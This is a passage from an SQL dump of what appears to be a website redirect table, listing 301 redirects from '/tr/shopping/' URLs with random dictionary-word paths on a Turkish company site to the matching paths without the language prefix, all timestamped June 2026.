00:00:00',301),(76953,'https://3s-technologies.com.tr/tr/shopping/chemically/2890213956.html',NULL,'https://3s-technologies.com.tr/shopping/chemically/2890213956.html','',1,0,'2026-06-11 09:32:01','0000-00-00 00:00:00',301),(76954,'https://3s-technologies.com.tr/tr/shopping/qualifier/2987773385.html',NULL,'https://3s-technologies.com.tr/shopping/qualifier/2987773385.html','',1,0,'2026-06-11 09:32:05','0000-00-00 00:00:00',301),(76955,'https://3s-technologies.com.tr/tr/shopping/plonge/3430406395.html',NULL,'https://3s-technologies.com.tr/shopping/plonge/3430406395.html','',1,0,'2026-06-11 09:32:07','0000-00-00 00:00:00',301),(76956,'https://3s-technologies.com.tr/tr/shopping/unalmsed/2255754507.html',NULL,'https://3s-technologies.com.tr/shopping/unalmsed/2255754507.html','',1,0,'2026-06-11 09:32:10','0000-00-00 00:00:00',301),(76957,'https://3s-technologies.com.tr/tr/shopping/machinating/460829393.html',NULL,'https://3s-technologies.com.tr/shopping/machinating/460829393.html','',1,0,'2026-06-11 09:32:13','0000-00-00 00:00:00',301),(76958,'https://3s-technologies.com.tr/tr/shopping/eunectes/1433774767.html',NULL,'https://3s-technologies.com.tr/shopping/eunectes/1433774767.html','',1,0,'2026-06-11 09:32:16','0000-00-00 00:00:00',301),(76959,'https://3s-technologies.com.tr/tr/shopping/stimulate/590484371.html',NULL,'https://3s-technologies.com.tr/shopping/stimulate/590484371.html','',1,0,'2026-06-11 09:32:19','0000-00-00 00:00:00',301),(76960,'https://3s-technologies.com.tr/tr/shopping/effusus/1114159202.html',NULL,'https://3s-technologies.com.tr/shopping/effusus/1114159202.html','',1,0,'2026-06-11 09:32:22','0000-00-00 00:00:00',301),(76961,'https://3s-technologies.com.tr/tr/shopping/harmine/3373639599.html',NULL,'https://3s-technologies.com.tr/shopping/harmine/3373639599.html','',1,0,'2026-06-11 09:32:25','0000-00-00 00:00:00',301),(76962,'https://3s-technologies.com.tr/tr/shopping/brushed/3211207358.html',NULL,'https://3s-technologies.com.tr/shopping/brushed/3211207358.html','',1,0,'2026-06-11 09:32:28','0000-00-00 00:00:00',301),(76963,'https://3s-technologies.com.tr/tr/shopping/algologist/1709808789.html',NULL,'https://3s-technologies.com.tr/shopping/algologist/1709808789.html','',1,0,'2026-06-11 09:32:31','0000-00-00 00:00:00',301),(76964,'https://3s-technologies.com.tr/tr/shopping/thurl/488312315.html',NULL,'https://3s-technologies.com.tr/shopping/thurl/488312315.html','',1,0,'2026-06-11 09:32:35','0000-00-00 00:00:00',301),(76965,'https://3s-technologies.com.tr/tr/shopping/sunfish/1412274535.html',NULL,'https://3s-technologies.com.tr/shopping/sunfish/1412274535.html','',1,0,'2026-06-11 09:32:37','0000-00-00 00:00:00',301),(76966,'https://3s-technologies.com.tr/tr/shopping/journalized/1703844395.html',NULL,'https://3s-technologies.com.tr/shopping/journalized/1703844395.html','',1,0,'2026-06-11 09:32:40','0000-00-00 00:00:00',301),(76967,'https://3s-technologies.com.tr/tr/shopping/spontaneously/2932445931.html',NULL,'https://3s-technologies.com.tr/shopping/spontaneously/2932445931.html','',1,0,'2026-06-11 09:32:43','0000-00-00 00:00:00',301),(76968,'https://3s-technologies.com.tr/tr/shopping/samshoo/4173372291.html',NULL,'https://3s-technologies.com.tr/shopping/samshoo/4173372291.html','',1,0,'2026-06-11 09:32:46','0000-00-00 00:00:00',301),(76969,'https://3s-technologies.com.tr/tr/shopping/importableness/3689880674.html',NULL,'https://3s-technologies.com.tr/shopping/importableness/3689880674.html','',1,0,'2026-06-11 09:32:49','0000-00-00 00:00:00',301),(76970,'https://3s-technologies.com.tr/tr/shopping/pseudo/1653812665.html',NULL,'https://3s-technologies.com.tr/shopping/pseudo/1653812665.html','',1,0,'2026-06-11 09:32:52','0000-00-00 00:00:00',301),(76971,'https://3s-technologies.com.tr/tr/shopping/monasticism/3301564224.html',NULL,'https://3s-technologies.com.tr/shopping/monasticism/3301564224.html','',1,0,'2026-06-11 09:32:56','0000-00-00 00:00:00',301),(76972,'https://3s-technologies.com.tr/tr/shopping/effascination/3205242932.html',NULL,'https://3s-technologies.com.tr/shopping/effascination/3205242932.html','',1,0,'2026-06-11 09:32:58','0000-00-00 00:00:00',301),(76973,'https://3s-technologies.com.tr/tr/shopping/camously/2357477394.html',NULL,'https://3s-technologies.com.tr/shopping/camously/2357477394.html','',1,0,'2026-06-11 09:33:01','0000-00-00 00:00:00',301),(76974,'https://3s-technologies.com.tr/tr/shopping/counterbalancedadj/2020463177.html',NULL,'https://3s-technologies.com.tr/shopping/counterbalancedadj/2020463177.html','',1,0,'2026-06-11 09:33:04','0000-00-00 00:00:00',301),(76975,'https://3s-technologies.com.tr/tr/shopping/accruer/2249790097.html',NULL,'https://3s-technologies.com.tr/shopping/accruer/2249790097.html','',1,0,'2026-06-11 09:33:07','0000-00-00 00:00:00',301),(76976,'https://3s-technologies.com.tr/tr/shopping/boneless/1646103554.html',NULL,'https://3s-technologies.com.tr/shopping/boneless/1646103554.html','',1,0,'2026-06-11 09:33:14','0000-00-00 00:00:00',301),(76977,'https://3s-technologies.com.tr/tr/shopping/provant/4123217021.html',NULL,'https://3s-technologies.com.tr/shopping/provant/4123217021.html','',1,0,'2026-06-11 09:33:16','0000-00-00 00:00:00',301),(76978,'https://3s-technologies.com.tr/tr/shopping/santonate/1606615065.html',NULL,'https://3s-technologies.com.tr/shopping/santonate/1606615065.html','',1,0,'2026-06-11 09:33:19','0000-00-00 00:00:00',301),(76979,'https://3s-technologies.com.tr/tr/shopping/florid/554703485.html',NULL,'https://3s-technologies.com.tr/shopping/florid/554703485.html','',1,0,'2026-06-11 09:33:22','0000-00-00 00:00:00',301),(76980,'https://3s-technologies.com.tr/tr/shopping/budded/646689238.html',NULL,'https://3s-technologies.com.tr/shopping/budded/646689238.html','',1,0,'2026-06-11 09:33:25','0000-00-00 00:00:00',301),(76981,'https://3s-technologies.com.tr/tr/shopping/edentate/3552540392.html',NULL,'https://3s-technologies.com.tr/shopping/edentate/3552540392.html','',1,0,'2026-06-11 09:33:28','0000-00-00 00:00:00',301),(76982,'https://3s-technologies.com.tr/tr/shopping/bedabbled/4073813994.html',NULL,'https://3s-technologies.com.tr/shopping/bedabbled/4073813994.html','',1,0,'2026-06-11 09:33:34','0000-00-00 00:00:00',301),(76983,'https://3s-technologies.com.tr/tr/shopping/thimbleberry/2094930385.html',NULL,'https://3s-technologies.com.tr/shopping/thimbleberry/2094930385.html','',1,0,'2026-06-11 09:33:36','0000-00-00 00:00:00',301),(76984,'https://3s-technologies.com.tr/tr/shopping/tuberosa/196161376.html',NULL,'https://3s-technologies.com.tr/shopping/tuberosa/196161376.html','',1,0,'2026-06-11 09:33:40','0000-00-00 00:00:00',301),(76985,'https://3s-technologies.com.tr/tr/shopping/intensative/1986030989.html',NULL,'https://3s-technologies.com.tr/shopping/intensative/1986030989.html','',1,0,'2026-06-11 09:33:43','0000-00-00 00:00:00',301),(76986,'https://3s-technologies.com.tr/tr/shopping/desulphurization/1989571201.html',NULL,'https://3s-technologies.com.tr/shopping/desulphurization/1989571201.html','',1,0,'2026-06-11 09:33:46','0000-00-00 00:00:00',301),(76987,'https://3s-technologies.com.tr/tr/shopping/romany/327398434.html',NULL,'https://3s-technologies.com.tr/shopping/romany/327398434.html','',1,0,'2026-06-11 09:33:48','0000-00-00 00:00:00',301),(76988,'https://3s-technologies.com.tr/tr/shopping/weesel/3087331698.html',NULL,'https://3s-technologies.com.tr/shopping/weesel/3087331698.html','',1,0,'2026-06-11 09:33:52','0000-00-00 00:00:00',301),(76989,'https://3s-technologies.com.tr/tr/shopping/hsien/1704007918.html',NULL,'https://3s-technologies.com.tr/shopping/hsien/1704007918.html','',1,0,'2026-06-11 09:33:55','0000-00-00 00:00:00',301),(76990,'https://3s-technologies.com.tr/tr/shopping/pamperize/1209128695.html',NULL,'https://3s-technologies.com.tr/shopping/pamperize/1209128695.html','',1,0,'2026-06-11 09:33:58','0000-00-00 00:00:00',301),(76991,'https://3s-technologies.com.tr/tr/shopping/regaling/1700467690.html',NULL,'https://3s-technologies.com.tr/shopping/regaling/1700467690.html','',1,0,'2026-06-11 09:34:01','0000-00-00 00:00:00',301),(76992,'https://3s-technologies.com.tr/tr/shopping/seemlier/2574979306.html',NULL,'https://3s-technologies.com.tr/shopping/seemlier/2574979306.html','',1,0,'2026-06-11 09:34:04','0000-00-00 00:00:00',301),(76993,'https://3s-technologies.com.tr/tr/shopping/mispolicy/1257161541.html',NULL,'https://3s-technologies.com.tr/shopping/mispolicy/1257161541.html','',1,0,'2026-06-11 09:34:07','0000-00-00 00:00:00',301),(76994,'https://3s-technologies.com.tr/tr/shopping/checkage/2399709337.html',NULL,'https://3s-technologies.com.tr/shopping/checkage/2399709337.html','',1,0,'2026-06-11 09:34:10','0000-00-00 00:00:00',301),(76995,'https://3s-technologies.com.tr/tr/shopping/assayer/191409049.html',NULL,'https://3s-technologies.com.tr/shopping/assayer/191409049.html','',1,0,'2026-06-11 09:34:13','0000-00-00 00:00:00',301),(76996,'https://3s-technologies.com.tr/tr/shopping/caloris/3124974853.html',NULL,'https://3s-technologies.com.tr/shopping/caloris/3124974853.html','',1,0,'2026-06-11 09:34:16','0000-00-00 00:00:00',301),(76997,'https://3s-technologies.com.tr/tr/shopping/perpetuity/3690044181.html',NULL,'https://3s-technologies.com.tr/shopping/perpetuity/3690044181.html','',1,0,'2026-06-11 09:34:19','0000-00-00 00:00:00',301),(76998,'https://3s-technologies.com.tr/tr/shopping/farcicalness/4260816895.html',NULL,'https://3s-technologies.com.tr/shopping/farcicalness/4260816895.html','',1,0,'2026-06-11 09:34:22','0000-00-00 00:00:00',301),(76999,'https://3s-technologies.com.tr/tr/shopping/moldy/1791014133.html',NULL,'https://3s-technologies.com.tr/shopping/moldy/1791014133.html','',1,0,'2026-06-11 09:34:25','0000-00-00 00:00:00',301),(77000,'https://3s-technologies.com.tr/tr/shopping/amassment/1802779430.html',NULL,'https://3s-technologies.com.tr/shopping/amassment/1802779430.html','',1,0,'2026-06-11 09:34:28','0000-00-00 00:00:00',301),(77001,'https://3s-technologies.com.tr/tr/shopping/tubercular/575178878.html',NULL,'https://3s-technologies.com.tr/shopping/tubercular/575178878.html','',1,0,'2026-06-11 09:34:32','0000-00-00 00:00:00',301),(77002,'https://3s-technologies.com.tr/tr/shopping/loony/1283595903.html',NULL,'https://3s-technologies.com.tr/shopping/loony/1283595903.html','',1,0,'2026-06-11 09:34:35','0000-00-00 00:00:00',301),(77003,'https://3s-technologies.com.tr/tr/shopping/nitrogelatine/1910164406.html',NULL,'https://3s-technologies.com.tr/shopping/nitrogelatine/1910164406.html','',1,0,'2026-06-11 09:34:38','0000-00-00 00:00:00',301),(77004,'https://3s-technologies.com.tr/tr/shopping/corven/3543501630.html',NULL,'https://3s-technologies.com.tr/shopping/corven/3543501630.html','',1,0,'2026-06-11 09:34:41','0000-00-00 00:00:00',301),(77005,'https://3s-technologies.com.tr/tr/shopping/centinel/1086670807.html',NULL,'https://3s-technologies.com.tr/shopping/centinel/1086670807.html','',1,0,'2026-06-11 09:34:44','0000-00-00 00:00:00',301),(77006,'https://3s-technologies.com.tr/tr/shopping/sufficit/2923688212.html',NULL,'https://3s-technologies.com.tr/shopping/sufficit/2923688212.html','',1,0,'2026-06-11 09:34:47','0000-00-00 00:00:00',301),(77007,'https://3s-technologies.com.tr/tr/shopping/dormy/1537948760.html',NULL,'https://3s-technologies.com.tr/shopping/dormy/1537948760.html','',1,0,'2026-06-11 09:34:50','0000-00-00 00:00:00',301),(77008,'https://3s-technologies.com.tr/tr/shopping/biparietal/1201205368.html',NULL,'https://3s-technologies.com.tr/shopping/biparietal/1201205368.html','',1,0,'2026-06-11 09:34:53','0000-00-00 00:00:00',301),(77009,'https://3s-technologies.com.tr/tr/shopping/inscroll/116679195.html',NULL,'https://3s-technologies.com.tr/shopping/inscroll/116679195.html','',1,0,'2026-06-11 09:34:56','0000-00-00 00:00:00',301),(77010,'https://3s-technologies.com.tr/tr/shopping/spherobacterium/3680049654.html',NULL,'https://3s-technologies.com.tr/shopping/spherobacterium/3680049654.html','',1,0,'2026-06-11 09:34:59','0000-00-00 00:00:00',301),(77011,'https://3s-technologies.com.tr/tr/shopping/glutaeus/1913160313.html',NULL,'https://3s-technologies.com.tr/shopping/glutaeus/1913160313.html','',1,0,'2026-06-11 09:35:04','0000-00-00 00:00:00',301),(77012,'https://3s-technologies.com.tr/tr/shopping/pantacosm/910308679.html',NULL,'https://3s-technologies.com.tr/shopping/pantacosm/910308679.html','',1,0,'2026-06-11 09:35:08','0000-00-00 00:00:00',301),(77013,'https://3s-technologies.com.tr/tr/shopping/knives/1126738192.html',NULL,'https://3s-technologies.com.tr/shopping/knives/1126738192.html','',1,0,'2026-06-11 09:35:11','0000-00-00 00:00:00',301),(77014,'https://3s-technologies.com.tr/tr/shopping/commove/631758398.html',NULL,'https://3s-technologies.com.tr/shopping/commove/631758398.html','',1,0,'2026-06-11 09:35:17','0000-00-00 00:00:00',301),(77015,'https://3s-technologies.com.tr/tr/shopping/anaclinal/354348738.html',NULL,'https://3s-technologies.com.tr/shopping/anaclinal/354348738.html','',1,0,'2026-06-11 09:35:20','0000-00-00 00:00:00',301),(77016,'https://3s-technologies.com.tr/tr/shopping/appellate/4045209617.html',NULL,'https://3s-technologies.com.tr/shopping/appellate/4045209617.html','',1,0,'2026-06-11 09:35:23','0000-00-00 00:00:00',301),(77017,'https://3s-technologies.com.tr/tr/shopping/swamped/883847425.html',NULL,'https://3s-technologies.com.tr/shopping/swamped/883847425.html','',1,0,'2026-06-11 09:35:26','0000-00-00 00:00:00',301),(77018,'https://3s-technologies.com.tr/tr/shopping/epacris/2488345357.html',NULL,'https://3s-technologies.com.tr/shopping/epacris/2488345357.html','',1,0,'2026-06-11 09:35:29','0000-00-00 00:00:00',301),(77019,'https://3s-technologies.com.tr/tr/shopping/kidnap/34896680.html',NULL,'https://3s-technologies.com.tr/shopping/kidnap/34896680.html','',1,0,'2026-06-11 09:35:32','0000-00-00 00:00:00',301),(77020,'https://3s-technologies.com.tr/tr/shopping/dairymen/98438408.html',NULL,'https://3s-technologies.com.tr/shopping/dairymen/98438408.html','',1,0,'2026-06-11 09:35:35','0000-00-00 00:00:00',301),(77021,'https://3s-technologies.com.tr/tr/shopping/connaturalness/984644729.html',NULL,'https://3s-technologies.com.tr/shopping/connaturalness/984644729.html','',1,0,'2026-06-11 09:35:38','0000-00-00 00:00:00',301),(77022,'https://3s-technologies.com.tr/tr/shopping/hyodon/2751455047.html',NULL,'https://3s-technologies.com.tr/shopping/hyodon/2751455047.html','',1,0,'2026-06-11 09:35:41','0000-00-00 00:00:00',301),(77023,'https://3s-technologies.com.tr/tr/shopping/frieze/1186461804.html',NULL,'https://3s-technologies.com.tr/shopping/frieze/1186461804.html','',1,0,'2026-06-11 09:35:44','0000-00-00 00:00:00',301),(77024,'https://3s-technologies.com.tr/tr/shopping/prevertebral/3298187535.html',NULL,'https://3s-technologies.com.tr/shopping/prevertebral/3298187535.html','',1,0,'2026-06-11 09:35:47','0000-00-00 00:00:00',301),(77025,'https://3s-technologies.com.tr/tr/shopping/desulphurize/3849606295.html',NULL,'https://3s-technologies.com.tr/shopping/desulphurize/3849606295.html','',1,0,'2026-06-11 09:35:50','0000-00-00 00:00:00',301),(77026,'https://3s-technologies.com.tr/tr/shopping/oathbreaking/3270704597.html',NULL,'https://3s-technologies.com.tr/shopping/oathbreaking/3270704597.html','',1,0,'2026-06-11 09:35:53','0000-00-00 00:00:00',301),(77027,'https://3s-technologies.com.tr/tr/shopping/hardbitten/3650886606.html',NULL,'https://3s-technologies.com.tr/shopping/hardbitten/3650886606.html','',1,0,'2026-06-11 09:35:57','0000-00-00 00:00:00',301),(77028,'https://3s-technologies.com.tr/tr/shopping/nontaxable/2111049571.html',NULL,'https://3s-technologies.com.tr/shopping/nontaxable/2111049571.html','',1,0,'2026-06-11 09:35:59','0000-00-00 00:00:00',301),(77029,'https://3s-technologies.com.tr/tr/shopping/yolden/1608600616.html',NULL,'https://3s-technologies.com.tr/shopping/yolden/1608600616.html','',1,0,'2026-06-11 09:36:02','0000-00-00 00:00:00',301),(77030,'https://3s-technologies.com.tr/tr/shopping/prefectorial/235198465.html',NULL,'https://3s-technologies.com.tr/shopping/prefectorial/235198465.html','',1,0,'2026-06-11 09:36:05','0000-00-00 00:00:00',301),(77031,'https://3s-technologies.com.tr/tr/shopping/prore/2652767899.html',NULL,'https://3s-technologies.com.tr/shopping/prore/2652767899.html','',1,0,'2026-06-11 09:36:10','0000-00-00 00:00:00',301),(77032,'https://3s-technologies.com.tr/tr/shopping/murdress/363689837.html',NULL,'https://3s-technologies.com.tr/shopping/murdress/363689837.html','',1,0,'2026-06-11 09:36:13','0000-00-00 00:00:00',301),(77033,'https://3s-technologies.com.tr/tr/shopping/stile/508639507.html',NULL,'https://3s-technologies.com.tr/shopping/stile/508639507.html','',1,0,'2026-06-11 09:36:16','0000-00-00 00:00:00',301),(77034,'https://3s-technologies.com.tr/tr/shopping/coarticulation/2458799619.html',NULL,'https://3s-technologies.com.tr/shopping/coarticulation/2458799619.html','',1,0,'2026-06-11 09:36:19','0000-00-00 00:00:00',301),(77035,'https://3s-technologies.com.tr/tr/shopping/drunkenhead/1558249044.html',NULL,'https://3s-technologies.com.tr/shopping/drunkenhead/1558249044.html','',1,0,'2026-06-11 09:36:22','0000-00-00 00:00:00',301),(77036,'https://3s-technologies.com.tr/tr/shopping/idolatrized/1307940190.html',NULL,'https://3s-technologies.com.tr/shopping/idolatrized/1307940190.html','',1,0,'2026-06-11 09:36:25','0000-00-00 00:00:00',301),(77037,'https://3s-technologies.com.tr/tr/shopping/ornithon/3005629607.html',NULL,'https://3s-technologies.com.tr/shopping/ornithon/3005629607.html','',1,0,'2026-06-11 09:36:28','0000-00-00 00:00:00',301),(77038,'https://3s-technologies.com.tr/tr/shopping/elephantiasis/2841835768.html',NULL,'https://3s-technologies.com.tr/shopping/elephantiasis/2841835768.html','',1,0,'2026-06-11 09:36:31','0000-00-00 00:00:00',301),(77039,'https://3s-technologies.com.tr/tr/shopping/dephlegmating/46078581.html',NULL,'https://3s-technologies.com.tr/shopping/dephlegmating/46078581.html','',1,0,'2026-06-11 09:36:34','0000-00-00 00:00:00',301),(77040,'https://3s-technologies.com.tr/tr/shopping/subvertebral/1273280743.html',NULL,'https://3s-technologies.com.tr/shopping/subvertebral/1273280743.html','',1,0,'2026-06-11 09:36:37','0000-00-00 00:00:00',301),(77041,'https://3s-technologies.com.tr/tr/shopping/dyers/695852958.html',NULL,'https://3s-technologies.com.tr/shopping/dyers/695852958.html','',1,0,'2026-06-11 09:36:40','0000-00-00 00:00:00',301),(77042,'https://3s-technologies.com.tr/tr/shopping/bracteole/3443998505.html',NULL,'https://3s-technologies.com.tr/shopping/bracteole/3443998505.html','',1,0,'2026-06-11 09:36:43','0000-00-00 00:00:00',301),(77043,'https://3s-technologies.com.tr/tr/shopping/collenchyma/3093776626.html',NULL,'https://3s-technologies.com.tr/shopping/collenchyma/3093776626.html','',1,0,'2026-06-11 09:36:46','0000-00-00 00:00:00',301),(77044,'https://3s-technologies.com.tr/tr/shopping/coeducational/2595143007.html',NULL,'https://3s-technologies.com.tr/shopping/coeducational/2595143007.html','',1,0,'2026-06-11 09:36:49','0000-00-00 00:00:00',301),(77045,'https://3s-technologies.com.tr/tr/shopping/boschas/2471794099.html',NULL,'https://3s-technologies.com.tr/shopping/boschas/2471794099.html','',1,0,'2026-06-11 09:36:52','0000-00-00 00:00:00',301),(77046,'https://3s-technologies.com.tr/tr/shopping/manequin/1653081100.html',NULL,'https://3s-technologies.com.tr/shopping/manequin/1653081100.html','',1,0,'2026-06-11 09:36:55','0000-00-00 00:00:00',301),(77047,'https://3s-technologies.com.tr/tr/shopping/coassus/1873869949.html',NULL,'https://3s-technologies.com.tr/shopping/coassus/1873869949.html','',1,0,'2026-06-11 09:36:58','0000-00-00 00:00:00',301),(77048,'https://3s-technologies.com.tr/tr/shopping/courteous/3855008776.html',NULL,'https://3s-technologies.com.tr/shopping/courteous/3855008776.html','',1,0,'2026-06-11 09:37:01','0000-00-00 00:00:00',301),(77049,'https://3s-technologies.com.tr/tr/shopping/faquir/221960226.html',NULL,'https://3s-technologies.com.tr/shopping/faquir/221960226.html','',1,0,'2026-06-11 09:37:04','0000-00-00 00:00:00',301),(77050,'https://3s-technologies.com.tr/tr/shopping/hogcote/1812163566.html',NULL,'https://3s-technologies.com.tr/shopping/hogcote/1812163566.html','',1,0,'2026-06-11 09:37:07','0000-00-00 00:00:00',301),(77051,'https://3s-technologies.com.tr/tr/shopping/teetuck/3999993918.html',NULL,'https://3s-technologies.com.tr/shopping/teetuck/3999993918.html','',1,0,'2026-06-11 09:37:10','0000-00-00 00:00:00',301),(77052,'https://3s-technologies.com.tr/tr/shopping/bevile/3185723288.html',NULL,'https://3s-technologies.com.tr/shopping/bevile/3185723288.html','',1,0,'2026-06-11 09:37:13','0000-00-00 00:00:00',301),(77053,'https://3s-technologies.com.tr/tr/shopping/stigmatics/1267316349.html',NULL,'https://3s-technologies.com.tr/shopping/stigmatics/1267316349.html','',1,0,'2026-06-11 09:37:16','0000-00-00 00:00:00',301),(77054,'https://3s-technologies.com.tr/tr/shopping/renomee/803365130.html',NULL,'https://3s-technologies.com.tr/shopping/renomee/803365130.html','',1,0,'2026-06-11 09:37:19','0000-00-00 00:00:00',301),(77055,'https://3s-technologies.com.tr/tr/shopping/pratinocola/4060303996.html',NULL,'https://3s-technologies.com.tr/shopping/pratinocola/4060303996.html','',1,0,'2026-06-11 09:37:22','0000-00-00 00:00:00',301),(77056,'https://3s-technologies.com.tr/tr/shopping/opacular/1670397047.html',NULL,'https://3s-technologies.com.tr/shopping/opacular/1670397047.html','',1,0,'2026-06-11 09:37:25','0000-00-00 00:00:00',301),(77057,'https://3s-technologies.com.tr/tr/shopping/teras/1778343968.html',NULL,'https://3s-technologies.com.tr/shopping/teras/1778343968.html','',1,0,'2026-06-11 09:37:31','0000-00-00 00:00:00',301),(77058,'https://3s-technologies.com.tr/tr/shopping/piggeries/2961635919.html',NULL,'https://3s-technologies.com.tr/shopping/piggeries/2961635919.html','',1,0,'2026-06-11 09:37:34','0000-00-00 00:00:00',301),(77059,'https://3s-technologies.com.tr/tr/shopping/tastier/2890223359.html',NULL,'https://3s-technologies.com.tr/shopping/tastier/2890223359.html','',1,0,'2026-06-11 09:37:37','0000-00-00 00:00:00',301),(77060,'https://3s-technologies.com.tr/tr/shopping/brahmapootra/2636624944.html',NULL,'https://3s-technologies.com.tr/shopping/brahmapootra/2636624944.html','',1,0,'2026-06-11 09:37:40','0000-00-00 00:00:00',301),(77061,'https://3s-technologies.com.tr/tr/shopping/cheiropter/2277091200.html',NULL,'https://3s-technologies.com.tr/shopping/cheiropter/2277091200.html','',1,0,'2026-06-11 09:37:43','0000-00-00 00:00:00',301),(77062,'https://3s-technologies.com.tr/tr/shopping/minargent/4282525854.html',NULL,'https://3s-technologies.com.tr/shopping/minargent/4282525854.html','',1,0,'2026-06-11 09:37:46','0000-00-00 00:00:00',301),(77063,'https://3s-technologies.com.tr/tr/shopping/cypraea/1682507686.html',NULL,'https://3s-technologies.com.tr/shopping/cypraea/1682507686.html','',1,0,'2026-06-11 09:37:49','0000-00-00 00:00:00',301),(77064,'https://3s-technologies.com.tr/tr/shopping/sithence/3152275956.html',NULL,'https://3s-technologies.com.tr/shopping/sithence/3152275956.html','',1,0,'2026-06-11 09:37:52','0000-00-00 00:00:00',301),(77065,'https://3s-technologies.com.tr/tr/shopping/aubletii/554867008.html',NULL,'https://3s-technologies.com.tr/shopping/aubletii/554867008.html','',1,0,'2026-06-11 09:37:55','0000-00-00 00:00:00',301),(77066,'https://3s-technologies.com.tr/tr/shopping/tintinnabulary/537535707.html',NULL,'https://3s-technologies.com.tr/shopping/tintinnabulary/537535707.html','',1,0,'2026-06-11 09:37:58','0000-00-00 00:00:00',301),(77067,'https://3s-technologies.com.tr/tr/shopping/morpion/257747241.html',NULL,'https://3s-technologies.com.tr/shopping/morpion/257747241.html','',1,0,'2026-06-11 09:38:01','0000-00-00 00:00:00',301),(77068,'https://3s-technologies.com.tr/tr/shopping/exorcise/1707384607.html',NULL,'https://3s-technologies.com.tr/shopping/exorcise/1707384607.html','',1,0,'2026-06-11 09:38:04','0000-00-00 00:00:00',301),(77069,'https://3s-technologies.com.tr/tr/shopping/pluralist/14001414.html',NULL,'https://3s-technologies.com.tr/shopping/pluralist/14001414.html','',1,0,'2026-06-11 09:38:07','0000-00-00 00:00:00',301),(77070,'https://3s-technologies.com.tr/tr/shopping/fungiate/2769760393.html',NULL,'https://3s-technologies.com.tr/shopping/fungiate/2769760393.html','',1,0,'2026-06-11 09:38:10','0000-00-00 00:00:00',301),(77071,'https://3s-technologies.com.tr/tr/shopping/canutus/3496517360.html',NULL,'https://3s-technologies.com.tr/shopping/canutus/3496517360.html','',1,0,'2026-06-11 09:38:13','0000-00-00 00:00:00',301),(77072,'https://3s-technologies.com.tr/tr/shopping/gaviiformes/2708491507.html',NULL,'https://3s-technologies.com.tr/shopping/gaviiformes/2708491507.html','',1,0,'2026-06-11 09:38:19','0000-00-00 00:00:00',301),(77073,'https://3s-technologies.com.tr/tr/shopping/troopmeal/2175274427.html',NULL,'https://3s-technologies.com.tr/shopping/troopmeal/2175274427.html','',1,0,'2026-06-11 09:38:21','0000-00-00 00:00:00',301),(77074,'https://3s-technologies.com.tr/tr/shopping/wiedi/2292048964.html',NULL,'https://3s-technologies.com.tr/shopping/wiedi/2292048964.html','',1,0,'2026-06-11 09:38:24','0000-00-00 00:00:00',301),(77075,'https://3s-technologies.com.tr/tr/shopping/resplendishing/1998180719.html',NULL,'https://3s-technologies.com.tr/shopping/resplendishing/1998180719.html','',1,0,'2026-06-11 09:38:27','0000-00-00 00:00:00',301),(77076,'https://3s-technologies.com.tr/tr/shopping/homager/617235728.html',NULL,'https://3s-technologies.com.tr/shopping/homager/617235728.html','',1,0,'2026-06-11 09:38:30','0000-00-00 00:00:00',301),(77077,'https://3s-technologies.com.tr/tr/shopping/amphictyons/2479750205.html',NULL,'https://3s-technologies.com.tr/shopping/amphictyons/2479750205.html','',1,0,'2026-06-11 09:38:33','0000-00-00 00:00:00',301),(77078,'https://3s-technologies.com.tr/tr/shopping/thallene/1559461143.html',NULL,'https://3s-technologies.com.tr/shopping/thallene/1559461143.html','',1,0,'2026-06-11 09:38:36','0000-00-00 00:00:00',301),(77079,'https://3s-technologies.com.tr/tr/shopping/wordy/1313529947.html',NULL,'https://3s-technologies.com.tr/shopping/wordy/1313529947.html','',1,0,'2026-06-11 09:38:39','0000-00-00 00:00:00',301),(77080,'https://3s-technologies.com.tr/tr/shopping/santal/3801575664.html',NULL,'https://3s-technologies.com.tr/shopping/santal/3801575664.html','',1,0,'2026-06-11 09:38:42','0000-00-00 00:00:00',301),(77081,'https://3s-technologies.com.tr/tr/shopping/jordan/520713254.html',NULL,'https://3s-technologies.com.tr/shopping/jordan/520713254.html','',1,0,'2026-06-11 09:38:45','0000-00-00 00:00:00',301),(77082,'https://3s-technologies.com.tr/tr/shopping/saccate/2152423314.html',NULL,'https://3s-technologies.com.tr/shopping/saccate/2152423314.html','',1,0,'2026-06-11 09:38:48','0000-00-00 00:00:00',301),(77083,'https://3s-technologies.com.tr/tr/shopping/castoroides/3154253270.html',NULL,'https://3s-technologies.com.tr/shopping/castoroides/3154253270.html','',1,0,'2026-06-11 09:38:51','0000-00-00 00:00:00',301),(77084,'https://3s-technologies.com.tr/tr/shopping/patches/654878883.html',NULL,'https://3s-technologies.com.tr/shopping/patches/654878883.html','',1,0,'2026-06-11 09:38:54','0000-00-00 00:00:00',301),(77085,'https://3s-technologies.com.tr/tr/shopping/tetrapnuemonian/429800802.html',NULL,'https://3s-technologies.com.tr/shopping/tetrapnuemonian/429800802.html','',1,0,'2026-06-11 09:38:57','0000-00-00 00:00:00',301),(77086,'https://3s-technologies.com.tr/tr/shopping/torulous/3398555595.html',NULL,'https://3s-technologies.com.tr/shopping/torulous/3398555595.html','',1,0,'2026-06-11 09:39:00','0000-00-00 00:00:00',301),(77087,'https://3s-technologies.com.tr/tr/shopping/pragmaticalness/4262237721.html',NULL,'https://3s-technologies.com.tr/shopping/pragmaticalness/4262237721.html','',1,0,'2026-06-11 09:39:03','0000-00-00 00:00:00',301),(77088,'https://3s-technologies.com.tr/tr/shopping/beret/1327623357.html',NULL,'https://3s-technologies.com.tr/shopping/beret/1327623357.html','',1,0,'2026-06-11 09:39:06','0000-00-00 00:00:00',301),(77089,'https://3s-technologies.com.tr/tr/shopping/eyedeceiving/3654263295.html',NULL,'https://3s-technologies.com.tr/shopping/eyedeceiving/3654263295.html','',1,0,'2026-06-11 09:39:09','0000-00-00 00:00:00',301),(77090,'https://3s-technologies.com.tr/tr/shopping/testmarket/2958120432.html',NULL,'https://3s-technologies.com.tr/shopping/testmarket/2958120432.html','',1,0,'2026-06-11 09:39:12','0000-00-00 00:00:00',301),(77091,'https://3s-technologies.com.tr/tr/shopping/rance/1060626341.html',NULL,'https://3s-technologies.com.tr/shopping/rance/1060626341.html','',1,0,'2026-06-11 09:39:16','0000-00-00 00:00:00',301),(77092,'https://3s-technologies.com.tr/tr/shopping/surquedry/2352355972.html',NULL,'https://3s-technologies.com.tr/shopping/surquedry/2352355972.html','',1,0,'2026-06-11 09:39:23','0000-00-00 00:00:00',301),(77093,'https://3s-technologies.com.tr/tr/shopping/trichopterous/2792348276.html',NULL,'https://3s-technologies.com.tr/shopping/trichopterous/2792348276.html','',1,0,'2026-06-11 09:39:27','0000-00-00 